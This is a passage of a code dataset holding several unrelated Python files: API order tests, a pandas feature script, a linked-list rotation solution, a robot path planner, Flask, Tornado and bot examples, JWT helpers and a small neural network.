test_addOrUpdateAfterSaleSetting(self):\n url = wm_url() + \"/pcaal/core/sharing/addOrUpdateAfterSaleSetting\"\n data = read_yaml(\"test_addOrUpdateAfterSaleSetting.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers) # 发送请求\n # print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行售后设置保存\")\n\n#押金退款列表\n def test_getRefundPledgeOrderList(self):\n url = wm_url() + \"/pcaal/core/order/getRefundPledgeOrderList\"\n data = read_yaml(\"test_getRefundPledgeOrderList.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n # print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行押金退款列表\")\n\n#收款码订单\n def test_queryOrderListToB(self):\n url = wm_url() + \"/pcaal/core/order/queryOrderListToB\"\n data = read_yaml(\"test_queryOrderListToB.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n # print(s.text)\n result = json.loads(s.text)\n # print(result)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行收款码订单查询\")","sub_path":"wm_test/case/test_order.py","file_name":"test_order.py","file_ext":"py","file_size_in_byte":6448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411335403","text":"# -*- coding: utf-8 -*-\n# @Date : 2018-06-20 14:46:02\n# @Author : GEFE (gh_efe@163.com)\n# @Version : 1.0.0\n# @Describe : 计算evt3中每个类的概率,根据概率合并evt3特征\n\n\nimport numpy as np\nimport pandas as pd\n\n# common_path = r'~/Documents/Study/Python/merchants_bank'\ncommon_path = r'~/Documents/merchants_bank'\n# train\n# input\ntrain_usrid_evt3_path = common_path + r'/data/feature/train_usrid_evt3.csv'\n\n# train_usrid_evt3_flg_path = common_path + r'/data/feature/train_usrid_evt3_flg.csv'\n# output\ntrain_usrid_merge_evt3_path = common_path + r'/data/feature/train_usrid_merge_evt3.csv'\n\n# test\n# input\ntest_usrid_evt3_path = common_path + r'/data/feature/test_usrid_evt3.csv'\n\n# test_usrid_evt3_flg_path = common_path + r'/data/feature/test_usrid_evt3_flg.csv'\n# output\ntest_usrid_merge_evt3_path = common_path + r'/data/feature/test_usrid_merge_evt3.csv'\n\ntemp_path = common_path + r'/data/feature/temp.csv'\ndef count_evt3_proba():\n # 计算evt3的权重\n sum_evt3_count = 0\n train_evt3_df = pd.read_csv(train_usrid_evt3_path)\n test_evt3_df = pd.read_csv(test_usrid_evt3_path)\n # df = pd.read_csv(train_usrid_evt3_flg_path)\n both_evt3_df = pd.concat([train_evt3_df, test_evt3_df], axis=0)\n both_evt3_df.pop('USRID')\n for ele in both_evt3_df.columns:\n # print(ele)\n sum_evt3_count += sum(list(both_evt3_df[ele]))\n # print(sum_evt3_count)\n # break\n print(sum_evt3_count)\n\n evt3_proba = []\n # count = 0\n for ele in both_evt3_df.columns:\n evt3_count = sum(list(both_evt3_df[ele]))\n ele_evt3_proba = evt3_count/sum_evt3_count\n # if ele_evt3_proba < 0.00001:\n # print(count)\n # count += 1\n # print(ele_evt3_proba)\n # ele_evt3_proba = 0\n evt3_proba.append(ele_evt3_proba)\n \n # print('len evt3_proba', len(evt3_proba))\n # evt3_proba_df = pd.DataFrame(evt3_proba)\n # print('evt3_proba ',evt3_proba_df[:10])\n # evt3_proba_df.to_csv(temp_path)\n return evt3_proba\n\ndef sum_evt3_def(usrid_evt3_path, save_path):\n df = pd.read_csv(usrid_evt3_path)\n # print('df', df.shape)\n df_usrid = df['USRID']\n df.pop('USRID')\n print('df shape is ', df.shape)\n evt3_proba = count_evt3_proba()\n print('权值计算成功')\n merge_evt3 = []\n for ele in df.as_matrix():\n sum_evt3 = 0\n for x,j in zip(ele, evt3_proba):\n sum_evt3 += x * j\n merge_evt3.append(sum_evt3)\n # print(merge_evt3[:10])\n merge_evt3_df = pd.DataFrame(merge_evt3, columns=['MERGE_EVT3'])\n merge_evt3_df = pd.concat([df_usrid, merge_evt3_df],axis=1)\n merge_evt3_df.to_csv(save_path, index=0)\n print('保存成功')\n\nif __name__ == '__main__':\n # count_evt3_proba()\n sum_evt3_def(train_usrid_evt3_path, train_usrid_merge_evt3_path)\n sum_evt3_def(test_usrid_evt3_path, test_usrid_merge_evt3_path)\n print('结束')\n \n ","sub_path":"feature/merge_evt3.py","file_name":"merge_evt3.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"310312984","text":"class ListNode:\n def __init__(self, x, next=None):\n self.val = x\n self.next = next\n\n\nclass Solution:\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\n if not head or not head.next:\n return head\n length = self.length(head)\n if int(k % length) == 0:\n return head\n k = length - int(k % length)\n\n dummy = ListNode(-1)\n dummy.next = head\n parent = dummy\n current = head\n while current:\n if 0 == k:\n dummy.next = current\n parent.next = None\n\n parent = current\n current = current.next\n k = k - 1\n parent.next = head\n return dummy.next\n\n def length(self, root):\n length = 0\n while root:\n length = length + 1\n root = root.next\n return length\n\n\n# root = ListNode(1, ListNode(2, ListNode(3, ListNode(4, ListNode(5)))))\nroot = ListNode(0, ListNode(1, ListNode(2)))\nprint(Solution().length(root))\nresult = Solution().rotateRight(root, 4)\nprint(result)\n\n","sub_path":"rotate_list.py","file_name":"rotate_list.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"528894002","text":"import color_obj\nimport math\n\n#defines the state of the robot\nclass robot:\n \n #data describing the current state of the robot\n def __init__(self, my_coords, objects, my_quad):\n self.coords = my_coords\n self.objs = objects\n self.quadrant = my_quad\n\n #returns the angle with respect to the center\n def angle(self):\n return math.atan2(self.coords[1]-50, self.coords[0]-50)\n\n #returns distance from center\n def radius(self):\n return math.hypot(self.coords[0]-50, self.coords[1]-50)\n\n #changes the color quadrant to the next one\n def next_quad(self):\n if self.quadrant == 3: self.quadrant = 0\n else: self.quadrant += 1\n\n #returns blocks the robot is carrying\n def objs_held(self):\n held = []\n for b in self.objs:\n if b.retrieved: held.append(b)\n return held\n\n #returns blocks the robot could potentially target\n #must be target color, spotted, not retrieved, and not sorted\n def target_objs(self):\n targets = []\n for b in self.objs:\n if (b.color==self.quadrant) and b.spotted and (not b.retrieved) and (not b.sort):\n targets.append(b)\n return targets\n\n #sorts objects based on given attribute, low to high\n #only returns a list of targets if targets_only = True\n #attributes are distance and angle as of now\n def attr_sort(self, attribute, targets_only=True):\n if targets_only: objects = self.target_objs()\n else: objects = self.objs\n if attribute == 'distance':\n return sorted(objects, key=lambda x: x.dist(self.coords))\n elif attribute == 'angle':\n return sorted(objects, key=lambda x: x.angle_WRT_robot(self.coords))\n elif attribute == 'spotted':\n attr = []\n for o in objects:\n if o.spotted == True: attr.append(o)\n return attr\n\n #decides which object to go to next\n def next_obj(self):\n corners = [(5, 5), (95, 5), (95, 95), (5, 95)]\n if len(self.objs_held())==3: return corners[self.quadrant]\n elif len(self.attr_sort('spotted')) == 0:\n next_angle = self.angle() + math.pi/8\n if self.radius() < 15: rad = self.radius() + 5\n elif self.radius() > 50: rad = self.radius() - 30\n else: rad = self.radius()\n return (rad*math.cos(next_angle)+50, rad*math.sin(next_angle)+50)\n elif self.attr_sort('distance')[0].dist(self.coords)<10: return self.attr_sort('distance')[0]\n else: return self.attr_sort('angle')[0]\n\n #run-through that gets objects\n #mostly for testing, since actual parameters shifts are triggered by inputs\n def four_loops(self):\n goals = []\n for n in range(0, 4):\n while type(self.next_obj()) is not tuple:\n target = self.next_obj()\n self.next_obj().retrieved = True\n self.coords = target.coords\n goals.append(target.coords)\n goals.append(self.next_obj())\n self.coords = self.next_obj()\n for o in self.objs_held():\n o.sort = True\n o.retrieved = False\n self.next_quad()\n goals.append((5, 5))\n return goals\n\n #the idea here is that the robot outputs the immediate next location\n def next_step(self):\n target = next_obj()\n\n#testing the robot class\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport numpy\nimport math\n\nstuff = [color_obj.color_obj((8, 10), 0, True, False, False)]\nstuff.append(color_obj.color_obj((18, 10), 0, True, False, False))\nstuff.append(color_obj.color_obj((16, 37), 0, True, True, False))\nstuff.append(color_obj.color_obj((5, 94), 1, True, False, False))\nstuff.append(color_obj.color_obj((65, 37), 1, True, False, False))\nstuff.append(color_obj.color_obj((5, 17), 1, True, False, False))\nstuff.append(color_obj.color_obj((4, 38), 2, True, False, False))\nstuff.append(color_obj.color_obj((5, 31), 2, True, False, False))\nstuff.append(color_obj.color_obj((46, 37), 2, True, False, False))\nstuff.append(color_obj.color_obj((19, 91), 3, True, False, False))\nstuff.append(color_obj.color_obj((76, 37), 3, True, False, False))\nstuff.append(color_obj.color_obj((6, 37), 3, True, False, False))\nJJ = robot((3, 3), stuff, 0)\n\nplt.plot([JJ.coords[0]], [JJ.coords[1]], 'k+')\npoint_colors = ['bo', 'go', 'ro', 'yo']\nfor n in range(0, 4):\n xx = [o.coords[0] for o in JJ.objs[3*n:3*n+3]]\n yy = [o.coords[1] for o in JJ.objs[3*n:3*n+3]]\n plt.plot(xx, yy, point_colors[n])\nplt.plot([8*math.cos(x)+50 for x in numpy.arange(0, 6.35, math.pi/2)], [8*math.sin(y)+50 for y in numpy.arange(0, 6.35, math.pi/2)])\nplt.xlim([0, 100])\nplt.ylim([0, 100])\nplt.show()\n\"\"\"\n","sub_path":"robot_2019.py","file_name":"robot_2019.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3656568","text":"from sqlalchemy import (create_engine, MetaData, Column,\n Table, Integer, String)\n\nengine = create_engine('sqlite:///enderecos.db',\n echo=True)\n\nmetadata = MetaData(bind=engine)\n\nendereco_table = Table('endereco', metadata,\n Column('id', Integer, primary_key=True),\n Column('CEP', Integer, index=True),\n Column('Rua', String(100)),\n Column('Numero', Integer),\n Column('Complemento', String(40)))\n\nmetadata.create_all()","sub_path":"with_SQLAlchemy/Database/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316233192","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n#definimos x como um vetor de valores que vai de -5 a 5\n# em um intervalo de 0.5, ou seja, x = {-5 , -4.5, -4, -3.5, …\nx = np.arange(-5, 5, 0.5)\n\nprint(x)\nprint(type(x))\n\nsig = sigmoid(x)\nsig = np.array(sig)\nprint(sig)\nprint(type(sig))\n\nplt.plot(x, sig,\n color=\"g\",\n marker=\"o\",\n linestyle=\":\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"Função Sigmóide\")\nplt.grid()\nplt.savefig(\"plot_funcao_sigmoide_example.png\")\nplt.show()\n\n","sub_path":"05_graficos_matlibplot/06_a_funcao_sigmoidal_example.py","file_name":"06_a_funcao_sigmoidal_example.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296993337","text":"__author__ = 'weizheng'\n\nimport tornado.web\n\nfrom theme_manager import ThemeManager\nfrom account_manager import AccountManager\nfrom response_message import ReponseMessage\nimport os\n\nREQUEST_ARGUMENT_ACCOUNT_ID = \"account_id\"\nREQUEST_ARGUMENT_AUTH_TOKEN = \"auth_token\"\nREQUEST_ARGUMENT_THEME_CONTENT = \"theme_content\"\n\nclass ThemeUploadHandler(tornado.web.RequestHandler):\n def __init__(self):\n self.theme_manager = None\n self.account_manager = None\n\n def initialize(self, database_engine):\n self.theme_manager = ThemeManager(database_engine)\n self.account_manager = AccountManager(database_engine)\n\n # post arguments:\n # localhost:port/upload?account_id=***&&auth_token=***\n # theme_info is added in self.request.files[\"theme_content\"]\n def post(self):\n account_id = self.get_argument(REQUEST_ARGUMENT_ACCOUNT_ID)\n auth_token = self.get_argument(REQUEST_ARGUMENT_AUTH_TOKEN)\n\n file_metas = self.request.files[\"theme_content\"]\n upload_path = \"./\"\n for meta in file_metas:\n file_name = meta['file_name']\n file_path = os.path.join(upload_path, file_name)\n with open(file_path, 'wb') as up:\n up.write(meta['body'])\n up.write(meta['body'])\n #self.theme_manager.record_theme()\n response_msg = ReponseMessage()\n self.write(response_msg)","sub_path":"src/service_share_theme/theme_upload_handler.py","file_name":"theme_upload_handler.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"153568334","text":"# from rest_framework.decorators import api_view\nfrom django.http.response import JsonResponse\nfrom user.models import User\nfrom django.conf import settings\nimport jwt\n# from rest_framework.authentication import BaseAuthentication\nfrom rest_framework import exceptions\nfrom functools import wraps\n\n# class MyAuthentication(BaseAuthentication):\ndef create_token(id, email):\n try:\n token = jwt.encode({'user_id':id, 'user_email':email}, settings.SECRET_KEY, algorithm='HS256')\n return token\n except Exception:\n return JsonResponse({'error' : 'error creating token'})\n\n\ndef authenticate(function):\n def wrapper_function(*args, **kwargs): \n try:\n request = args[0].request\n encoded_token = request.headers['Token']\n decoded_token = jwt.decode(encoded_token, settings.SECRET_KEY, algorithms='HS256')\n # return JsonResponse({'id':decoded_token['user_id'], 'email':decoded_token['user_email']})\n # print(decoded_token['user_email'])\n return function(*args, **kwargs)\n except Exception as e:\n # print(str(e.__dict__))\n raise exceptions.AuthenticationFailed('invalid token')\n return wrapper_function","sub_path":"requirements/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"180343125","text":"\"\"\"Simple Bot to edit Bale messages.\"\"\"\n\nimport asyncio\n\nfrom balebot.filters import DefaultFilter, TextFilter\nfrom balebot.models.messages import TextMessage\nfrom balebot.updater import Updater\nfrom balebot.utils.logger import Logger\n\n# Bale Bot Authorization Token\n\nupdater = Updater(token=\"PUT YOUR TOKEN HERE\",\n loop=asyncio.get_event_loop())\n# Define dispatcher\ndispatcher = updater.dispatcher\nmy_logger = Logger.get_logger() # Create a logger and name it my_logger\n\n\n# Both of success and failure functions are optional\n\ndef success_send_message(response, user_data):\n kwargs = user_data['kwargs']\n update = kwargs[\"update\"]\n user_peer = update.get_effective_user()\n my_logger.info(\"Your message has been sent successfully.\", extra={\"user_id\": user_peer.peer_id, \"tag\": \"info\"})\n\n\ndef failure_send_message(response, user_data):\n kwargs = user_data['kwargs']\n update = kwargs[\"update\"]\n user_peer = update.get_effective_user()\n my_logger.error(\"Sending message has been failed\", extra={\"user_id\": user_peer.peer_id, \"tag\": \"error\"})\n\n\nrequest_random_id = None\n\n\n@dispatcher.command_handler(commands='/start')\ndef start(bot, update):\n message = TextMessage('*Hello this message will be edited when you send /edit command*')\n # Send a message to client\n request = bot.respond(update, message, success_callback=success_send_message, failure_callback=failure_send_message)\n global request_random_id\n request_random_id = request.get_json_object()['body']['randomId']\n print(request_random_id)\n\n\n@dispatcher.command_handler(commands='/edit')\ndef edit(bot, update):\n user_peer = update.get_effective_user()\n message = TextMessage('*message edited*')\n # edit nd a message to client\n bot.edit_message(message=message, user_peer=user_peer, random_id=request_random_id,\n success_callback=success_send_message, failure_callback=failure_send_message)\n\n\n# Run the bot!\nupdater.run()\n","sub_path":"examples/simple_edit_message.py","file_name":"simple_edit_message.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617287756","text":"# coding: utf-8\nfrom soccersimulator import Strategy, SoccerAction, Vector2D, SoccerTeam, Simulation, show_simu, math\nfrom soccersimulator import settings\nimport tools\n\nclass RandomStrategy(Strategy):\n def __init__(self):\n Strategy.__init__(self, \"Random\")\n\n def compute_strategy(self, state, id_team, id_player):\n # id_team is 1 or 2\n # id_player starts at 0\n return SoccerAction(Vector2D.create_random(),Vector2D.create_random())\n\nclass joueur_fonceur(Strategy):\n def __init__(self):\n Strategy.__init__(self,\"Fonceur\")\n \n def compute_strategy(self, state, id_team, id_player):\n s=SuperState(state,id_team,id_player)\n i=s.goal.x\n if s.norme>BALL_RADIUS:\n return SoccerAction((s.ball-s.player),Vector2D())\n return SoccerAction((s.ball-s.player),Vector2D(i,GAME_HEIGHT/2)-s.player)\n \nclass joueur_attaquant(Strategy):\n def __init__(self):\n Strategy.__init__(self, \"Attaquant\")\n \n def compute_strategy(self, state, id_team, id_player):\n s=SuperState(state,id_team,id_player)\n i=s.goal.x\n if s.norme>SHORT_RANGE:\n return SoccerAction((s.ball+s.vball*10-s.player).normalize()*maxPlayerAcceleration,Vector2D())\n if s.norme>BALL_RADIUS:\n return SoccerAction((s.ball-s.player),Vector2D())\n if (s.player.xGAME_WIDTH/2 and s.id_team==2):\n if s.eprocheGAME_WIDTH/2-1: \n return SoccerAction((Vector2D(GAME_WIDTH/5,GAME_HEIGHT/2)-s.player),Vector2D())\n if id_team==2:\n if s.ball.x\n \n

YO

\n \n \n \"\"\"\n\n\n@app.route('/push', methods=['POST'])\ndef push():\n pb_file = request.files['pbfile']\n if pb_file is None:\n return redirect('/')\n pb_file.save(f'test/server/{pb_file.filename}')\n return response_builder()\n\n\n@app.route('/pull/', methods=['GET'])\ndef pull(file):\n \"\"\"\n I saw [https://stackoverflow.com/questions/30505408/what-is-the-correct-protobuf-content-type]\n to decide MIME TYPE.\n :param file:\n :return:\n \"\"\"\n file_path = pathlib.Path(app.config['MODEL_DIRECTORY']) / pathlib.Path(file)\n if not file_path.exists():\n return response_builder(status_code=404, message='File Not Found')\n\n return send_file(str(file_path), mimetype='application/protobuf')\n\n\n@app.route('/exit')\ndef shut_down():\n shutdown_server()\n return 'shutting down'\n\n\ndef shutdown_server():\n \"\"\"\n see [http://flask.pocoo.org/snippets/67/]\n :return:\n \"\"\"\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n\ndef response_builder(status_code=200, message=None):\n return Response(status=status_code, response=message)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9999)\n","sub_path":"route1/TestServer.py","file_name":"TestServer.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"369777870","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 14:20:21 2019\n\n@author: ckielasjensen\n\"\"\"\nimport numpy as np\n# stateData(input_state, bezopt)\n# SLData((endTime-startTime, results))\n# KNNData((endTime-startTime, results))\n# DNNData((endTime-startTime, results))\n\nSLTimes = np.array([i[0] for i in SLData])\nKNNTimes = np.array([i[0] for i in KNNData])\nDNNTimes = np.array([i[0] for i in DNNData])\n\nallTimes = [SLTimes, KNNTimes, DNNTimes]\nstrTimes = ['Straight Line Guess', 'KNN Guess', 'DNN Guess']\n\nprint(f'Length of the test data: {len(SLTimes)}')\n\nprint(' MIN | MEAN | MAX | STD')\nfor i, t in enumerate(allTimes):\n msg = (f'{t.min():.3f} | {t.mean():.3f} | {t.max():.3f} | {t.std():.3f}'\n f' --- {strTimes[i]}')\n print(msg)\n \nBestKNN = [val-KNNTimes[i] for i, val in enumerate(SLTimes) if val > KNNTimes[i]]\nBestDNN = [val-DNNTimes[i] for i, val in enumerate(SLTimes) if val > DNNTimes[i]]\n\nprint(f'Number of times KNN was better: {len(BestKNN)}')\nprint(f'Average better time: {np.mean(BestKNN)}')\n\nprint(f'Number of times DNN was better: {len(BestDNN)}')\nprint(f'Average better time: {np.mean(BestDNN)}')","sub_path":"AnalyzeTimingData.py","file_name":"AnalyzeTimingData.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278046302","text":"import glob\nimport os\nimport string\n\nimport enchant\nfrom collections import OrderedDict\nimport numpy as np\nimport pandas as pd\n\nfrom chars import CharDict\nfrom words import WordDict\n\ndef lookup_dictionary(s, dictionary=WordDict):\n ## 1 : In dictionary, include it. Do not split\n ## 0 : In dictionary but exclude it.\n ## -1 : Not in dictionary.\n \n if s == '':\n return 0\n \n ## English check\n enchantment = enchant.Dict(\"en_US\")\n is_english = enchantment.check(s)\n \n if s in dictionary.INCLUDING_WORDS or is_english:\n return 1\n if s in dictionary.EXCLUDING_WORDS:\n return 0\n if s not in dictionary.INCLUDING_WORDS and is_english and s not in dictionary.EXCLUDING_WORDS:\n return -1\n \ndef remove_duplicates(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\ndef flatten(_iterable):\n if isinstance(_iterable, list):\n return [a for i in _iterable for a in flatten(i)]\n else:\n return [_iterable]\n\ndef split_scriptiocontinua(s):\n lookup_result = lookup_dictionary(s)\n if lookup_result == 1:\n return s\n elif lookup_result == 0:\n return ''\n else:\n return ' '.join(wordninja.split(s))\n \ndef handle_numerals(s, dictionary=WordDict):\n if s in dictionary.INCLUDING_WORDS:\n return s\n else:\n for num in range(10):\n s = s.replace(str(num), '')\n return s\n\ndef is_fully_printable(s):\n return all([i in string.printable for i in s])\n\ndef replace_chars(s, dictionary=CharDict):\n ## Replace punctuation\n s = \"\".join(list(map(lambda x: dictionary.PUNCTUATION_REPLACEMENT_DICT.get(x, x), s)))\n \n ## Replace letters\n s = \"\".join(list(map(lambda x: dictionary.LETTER_REPLACEMENTS_DICT.get(x, x), s)))\n return s\n\ndef strip_brackets(s, brackets=[('(', ')'), ('{', '}'), ('[', ']')]):\n bracket_points = []\n for bracket_pair in brackets:\n p1, p2 = bracket_pair\n if p1 in s and p2 in s:\n bracket_points.append((s.find(p1), s.find(p2)))\n \n return contents\n\n# brackets=[('(', ')'), ('{', '}'), ('[', ']')]\ndef extract_words(s, delimiter='@@@'):\n for punct in string.punctuation:\n s = s.replace(punct, delimiter)\n \n tokens = s.split(delimiter)\n tokens = remove_duplicates(tokens)\n\n tokens = list(map(lambda s: s.strip(), tokens))\n tokens = list(filter(lambda s: s not in string.punctuation, tokens))\n \n return tokens\n\nif __name__ == \"__main__\":\n\n IMAGES_DIR = \"./images/\"\n INPUT_METADATA_FILE = \"./metadata.txt\"\n OUTPUT_LABELS_FILE = \"./labels.txt\"\n DELIMITER = ','\n\n if os.path.isfile(OUTPUT_LABELS_FILE):\n print(OUTPUT_LABELS_FILE, 'exists. Exiting.')\n exit()\n\n ## Read metadata file\n labels_df = pd.read_csv(INPUT_METADATA_FILE, delimiter='|')\n labels_df = labels_df.replace(np.nan, '', regex=True)\n n_paintings = len(labels_df.index)\n\n for i, row in enumerate(np.array(labels_df[['Filename', 'Title', 'Artist', 'Location', 'Serie', 'Genre', 'Style', 'Tags']])):\n \n filename, title, artist, location, serie, genres, styles, tags = row\n \n image_file = os.path.join(IMAGES_DIR, filename)\n if not os.path.isfile(image_file):\n print(\"{} is not found\".format(image_file))\n continue\n\n # print(\"{}/{}\".format(i + 1, n_paintings))\n labels = []\n\n ## Location\n if location:\n location_org = location\n location = location.strip()\n location = replace_chars(location)\n location = location.lower()\n if location in WordDict.EXCLUDING_WORDS:\n labels.append(location)\n elif location in WordDict.INCLUDING_WORDS:\n labels.append(location)\n elif location in WordDict.MAPPING_WORDS:\n location = WordDict.MAPPING_WORDS[location]\n labels.extend(location)\n else:\n locations = extract_words(location)\n locations = list(map(handle_numerals, locations))\n location = locations\n labels.extend(location)\n # print(\"\\tLocation:\", location_org, \"-->\", location)\n\n ## Serie\n if serie:\n serie_org = serie\n serie = replace_chars(serie)\n serie = serie.lower()\n if serie in WordDict.EXCLUDING_WORDS:\n labels.append(serie)\n elif serie in WordDict.INCLUDING_WORDS:\n labels.append(serie)\n elif serie in WordDict.MAPPING_WORDS:\n serie = WordDict.MAPPING_WORDS[serie]\n labels.extend(serie)\n else:\n series = extract_words(serie)\n series = list(map(handle_numerals, series))\n serie = series\n labels.extend(serie)\n # print(\"\\tSerie:\", serie_org, \"-->\", serie)\n\n ## Genre\n if genres:\n genres_org = genres\n genres = replace_chars(genres)\n genres = genres.lower()\n genres_now = []\n for genre in genres.split(','):\n genre = genre.strip()\n if genre in WordDict.EXCLUDING_WORDS:\n continue\n elif genre in WordDict.INCLUDING_WORDS:\n genres_now.append(genre)\n elif genre in WordDict.MAPPING_WORDS:\n genre = WordDict.MAPPING_WORDS[genre]\n genres_now.extend(genre)\n else:\n genres = extract_words(genre)\n genres = list(map(handle_numerals, genres))\n genre = \" \".join(genres)\n genres_now.append(genre)\n # print(\"\\tGenres:\", genres_org, \"-->\", genres_now)\n labels.extend(genres_now)\n\n ## Style\n if styles:\n styles_org = styles\n styles = replace_chars(styles)\n styles = styles.lower()\n styles_now = []\n for style in styles.split(','):\n style = style.strip()\n if style in WordDict.EXCLUDING_WORDS:\n continue\n elif style in WordDict.INCLUDING_WORDS:\n styles_now.append(style)\n elif style in WordDict.MAPPING_WORDS:\n style = WordDict.MAPPING_WORDS[style]\n styles_now.extend(style)\n else:\n styles = extract_words(style)\n styles = list(map(handle_numerals, styles))\n style = \" \".join(styles)\n styles_now.append(style)\n # print(\"\\tStyles:\", styles_org, \"-->\", styles_now)\n labels.extend(styles_now)\n\n ## Tags\n if tags:\n tags_org = tags\n tags = replace_chars(tags)\n tags = tags.lower()\n tags_now = []\n for tag in tags.split(','):\n tag = tag.strip()\n if tag in WordDict.EXCLUDING_WORDS:\n continue\n elif tag in WordDict.INCLUDING_WORDS:\n tags_now.append(tag)\n elif tag in WordDict.MAPPING_WORDS:\n tag = WordDict.MAPPING_WORDS[tag]\n tags_now.extend(tag)\n else:\n tag = handle_numerals(tag)\n if '\"' in tag:\n parts = []\n for i in tag.split('\"'):\n i = i.replace('-', ' ').strip()\n if i != '':\n parts.append(i)\n tag = parts\n elif '-and-' in tag:\n tag = tag.split('-and-')\n tag = list(map(lambda s: s.replace('-', ' '), tag))\n elif '/' in tag:\n tag = tag.split('/')\n else:\n tag = tag.replace('-', ' ')\n tags_now.append(tag)\n # print(\"\\tTags:\", tags_org, \"-->\", tags_now)\n labels.extend(tags_now)\n\n # print('\\t\\tLabels:', labels)\n # print(\"------\")\n labels = flatten(labels)\n row_str = filename + DELIMITER\n for label in labels:\n row_str += label + DELIMITER\n row_str = row_str.strip().strip(DELIMITER) + '\\n'\n # print(row_str)\n with open(OUTPUT_LABELS_FILE, 'a') as f:\n f.write(row_str)","sub_path":"data/extract_labels.py","file_name":"extract_labels.py","file_ext":"py","file_size_in_byte":8586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"266497735","text":"# coding=utf-8\n\nimport subprocess\nimport simplejson as json\n\nfrom database.config import config\n\n\ndef send_slack_message(message, channel=\"4space\"):\n reply = {}\n reply['text'] = message\n reply['channel'] = \"#{channel}\".format(channel=channel)\n payload = 'payload={0}'.format(json.dumps(reply))\n subprocess.check_output([\n 'curl', '-X', 'POST', '--data-urlencode',\n payload, config[\"slack_url\"]\n ])\n","sub_path":"slack_handler.py","file_name":"slack_handler.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2533597","text":"def bigger_prod(n:int, s:float) -> bool:\n my_prod = 1\n for i in range(n):\n while True:\n try:\n x = float(input('Введите число: '))\n my_prod *= x\n break\n except ValueError:\n print('Используйте только числа (разделитель - \\'.\\')')\n return(my_prod > s)\n ","sub_path":"1400_basic_tasks/chap_7/7_24.py","file_name":"7_24.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203748938","text":"import numpy as np\n\n\n# A basic neural network (what a shock!)\n# The 'layer_sizes' parameter is a list of numbers which give the number of neurons contained in each layer.\n# The length of this list defines the total number of layers (including the input and output layers).\n# The 'activation_function' parameter defines which activation function is used for the network. The two possible\n# choices are 'sigmoid' and 'relu.'\n# Guidance from http://neuralnetworksanddeeplearning.com/\nclass NeuralNetwork:\n\n def __init__(self, layer_sizes, activation_function='sigmoid'):\n self.activations = {'sigmoid': (self.sigmoid, self.sigmoid_prime), 'relu': (self.relu, self.relu_prime)}\n self.layer_sizes = layer_sizes\n self.weights = self.create_weights()\n self.biases = self.create_biases()\n self.activation_function, self.activation_function_prime = self.activations[activation_function]\n\n # Runs the network forward to produce an output\n def run(self, input_data):\n output = input_data\n for weight_matrix, bias in zip(self.weights, self.biases):\n output = self.activation_function(np.dot(weight_matrix, output) + bias)\n return output\n\n # Trains the network on a minibatch of examples. The 'inputs' and 'targets' are lists of training examples and\n # target outputs respectively.\n def train_on_minibatch(self, inputs, targets, learning_rate):\n weight_gradients, bias_gradients = self.backprop(inputs, targets)\n self.weights -= learning_rate * weight_gradients\n for i, bias_gradient_matrix in zip(range(len(self.biases)), bias_gradients):\n for bias_gradient in bias_gradient_matrix.T:\n self.biases[i] -= learning_rate * bias_gradient\n\n # Returns the weight and bias gradients\n def backprop(self, inputs, targets):\n outputs = [np.array(inputs).T]\n intermediate_outputs = []\n for weight_matrix, bias in zip(self.weights, self.biases):\n bias_matrix = np.array([bias] * len(inputs)).T\n intermediate_outputs.append(np.dot(weight_matrix, outputs[-1]) + bias_matrix)\n outputs.append(self.activation_function(intermediate_outputs[-1]))\n # Derivative of the mean squared error w.r.t. the output: 